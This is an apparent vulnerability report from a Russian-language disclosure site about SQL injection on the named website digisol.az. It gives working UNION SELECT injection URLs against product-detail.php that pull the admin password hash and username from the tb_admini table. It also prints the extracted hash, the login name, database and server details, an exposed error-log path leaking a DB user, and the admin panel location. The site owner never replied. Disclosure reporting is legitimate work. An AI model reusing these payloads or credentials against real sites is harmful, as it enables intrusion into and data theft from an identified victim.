SQL Injection

digisol.az 05 Ноябрь 2017, 20:48

Подробная информация

Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)

Version~10.0.30-MariaDB-0+deb8u2~ (Debian)
User~digisol_use230@localhost
Primary Database~digisol_db216
No Of Databases~2
No Of Tables~12
http://digisol.az/product-detail.php?id=-73'+UNION+ALL+SELECT+1,2,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+tb_admini--+-'
Password: 477b20d49dddd4f70c3e683f5b379595
http://digisol.az/product-detail.php?id=-73%27+UNION+ALL+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+tb_admini--+-%27
Login razim
For find user name we used Error log file (digisol.az/error_log)

[14-May-2016 04:30:07 America/Chicago] PHP Warning: mysql_connect(): Access denied for user 'wwwwebde_digisol'@'localhost' (using password: YES) in /home/wwwwebde/public_html/demo/digisol/hsadmin/Config.php on line 7

Panel /hsadmin

Записи

  • 06 Март 2018, 10:54
    Статус уязвимости
    Нет ответа от источника

  • 07 Ноябрь 2017, 16:50
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 07 Ноябрь 2017, 16:37
    Уязвимости присвоен балл
    Модератор присвоил 5 баллов из 10-и на уязвимости

  • 07 Ноябрь 2017, 16:37
    Статус уязвимости
    Подтверждено со стороны модератора

  • 05 Ноябрь 2017, 20:48
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot